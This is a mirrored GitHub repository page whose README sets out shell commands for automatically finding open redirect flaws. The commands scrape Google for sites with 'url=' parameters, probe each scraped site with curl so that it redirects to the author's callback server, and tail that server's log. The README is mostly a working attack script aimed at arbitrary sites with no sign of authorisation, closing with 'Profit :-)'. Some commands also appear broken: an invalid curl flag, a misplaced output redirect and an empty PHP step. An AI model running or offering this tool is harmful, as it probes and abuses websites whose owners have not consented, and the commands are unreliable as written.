https://github.com/dotnetrussell/open-redirect-auto-scraper

https://github.com/dotnetrussell/open-redirect-auto-scraper

Last synced: 4 months ago
JSON representation

• Host: GitHub
• URL: https://github.com/dotnetrussell/open-redirect-auto-scraper
• Owner: DotNetRussell
• Created: 2019-08-29T11:38:01.000Z (almost 7 years ago)
• Default Branch: master
• Last Pushed: 2019-08-29T11:40:31.000Z (almost 7 years ago)
• Last Synced: 2025-10-23T23:40:32.395Z (8 months ago)
• Size: 1000 Bytes
• Stars: 0
• Watchers: 1
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
Step 1: 

On a public web server, create a php file that 

grabs the caller get variable out of the url 

and saves it to a file 

```

```

Step 2: 

On your attacking machine, run this search to get google dorks for /?url=

`for (( x = 1; x < 100; x++)); do a=$((x*10)); curl --connect-timeout 5 -A "Mozilla/4.0" -skLm 10 'https://www.google.com/search?start='"$a"'&tbs=li:1&q=inurl%3A%2F%3Furl%3Dhttp' | grep -o -P "\/url\?q=.+?&amp" | grep -o -P ".*(?<=url=)|.*(?<=%3Furl%3D)" | cut -d "=" -f2; sleep 5 >> targets ; done`

Step 3:

Replace the URL encodings

`sed -e 's/%3F/?/g' -e 's/%3D/=/g' targets > decoded`

Step 4: 

On your attacking machine, attempt to call your target list 

`for target in $(cat decoded); do curl --HEAD --max-redirs 3 --connect-timeout 2 -L --ignore $target"https://yourwebserver.com/openredirectchecker.php?caller=$target\n" ;done`

Step 5:

On your web server tail your output file

`tail -f opr.txt`

Step 6:

Profit :-)